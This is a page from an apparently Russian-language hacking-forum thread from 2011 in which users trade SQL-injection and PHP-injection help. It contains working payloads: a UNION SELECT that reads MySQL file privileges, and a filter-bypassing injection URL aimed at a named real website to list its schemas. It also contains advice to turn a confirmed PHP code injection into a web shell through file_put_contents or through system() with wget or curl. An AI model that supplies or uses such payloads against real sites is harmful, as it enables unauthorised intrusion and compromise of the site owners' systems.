30.11.2011, 14:19
|
|
Новичок
Регистрация: 29.11.2011
Сообщений: 5
С нами:
7607126
Репутация:
0
|
|
И еще извиняюсь за глупый вопрос, но как узнать file_priv и m.q , на форуме как то не нашел, а просматривать почти 2к страниц - смерть. И если узер sa значит ли это что file_priv Y ??
|
|
|
30.11.2011, 14:26
|
|
Познающий
Регистрация: 03.11.2011
Сообщений: 83
С нами:
7644566
Репутация:
11
|
|
Сообщение от h0w1tz3r
И еще извиняюсь за глупый вопрос, но как узнать file_priv и m.q , на форуме как то не нашел, а просматривать почти 2к страниц - смерть. И если узер sa значит ли это что file_priv Y ??
union+select+1,file_priv,3+from+mysql.user+where+u ser=user()
|
|
|
|
30.11.2011, 14:31
|
|
Новичок
Регистрация: 29.11.2011
Сообщений: 5
С нами:
7607126
Репутация:
0
|
|
Сообщение от tabletkO
union+select+1,file_priv,3+from+mysql.user+where+u ser=user()
А если стоит mssql ? Там юнион не работает параметр.
|
|
|
|
30.11.2011, 17:46
|
|
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами:
7638806
Репутация:
-6
|
|
Is this site inject able?
http://www.martinzaple.co.uk/gallery.php?id=17
Nothing works on it.
|
|
|
|
30.11.2011, 17:52
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от lightangel
Is this site inject able?
http://www.martinzaple.co.uk/gallery.php?id=17
Nothing works on it.
injectable
|
|
|
|
30.11.2011, 18:33
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от lightangel
Is this site inject able?
http://www.martinzaple.co.uk/gallery.php?id=17
Nothing works on it.
http://www.martinzaple.co.uk/gallery.php?id=-7+/*!union*/+select+1,(select+schema_name+from+information_sch ema.schemata),3,4,5,6,7--+
there "union" filter
|
|
|
|
30.11.2011, 22:21
|
|
Новичок
Регистрация: 22.08.2011
Сообщений: 2
С нами:
7749686
Репутация:
0
|
|
Народ такой вопрос. Есть скуля msql 4.0.24-standart. Не выводит никак database().
делаю concat_ws(0x3a,user(),database(),version()) - вся информация есть кроме имени базы. Такое впечатление что для данного user() не в одну базу нет доступа? Линку скинуть пока не могу но хотелось бы разобраться почему такое получается? Может посоветуете чего? Заранее спасибо.
|
|
|
|
30.11.2011, 22:32
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от zenon3
Такое впечатление что для данного user() не в одну базу нет доступа?
практически невозможно,
лучше скинь в пм, посмотрю
|
|
|
|
01.12.2011, 02:34
|
|
Новичок
Регистрация: 12.09.2011
Сообщений: 24
С нами:
7719446
Репутация:
0
|
|
нашел php injection запрос вот такой
http://сайт/imp_sub.html?_c=${@print(md5(kasper))}&_m=publicat ions&_t=rec&id=1403
в ответ получаю
67cb7dbdb935430911459f5431d61701Method {${@print(md5(kasper))}} in class [$this->rec] does not exists!
Кто подскажет каким методом раскрутить?
|
|
|
|
01.12.2011, 02:39
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Kasper1898
нашел php injection запрос вот такой
http://сайт/imp_sub.html?_c=${@print(md5(kasper))}&_m=publicat ions&_t=rec&id=1403
в ответ получаю
67cb7dbdb935430911459f5431d61701Method {${@print(md5(kasper))}} in class [$this->rec] does not exists!
Кто подскажет каким методом раскрутить?
да что там раскручивать, лей шелл одним запросом, copy, file_put_contents, если системные фунцкии не отключены, то system + wget или system + curl, вобщем фантазируй.
а в след раз открой учебник по php, прежде чем задавать элементарные вопросы
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
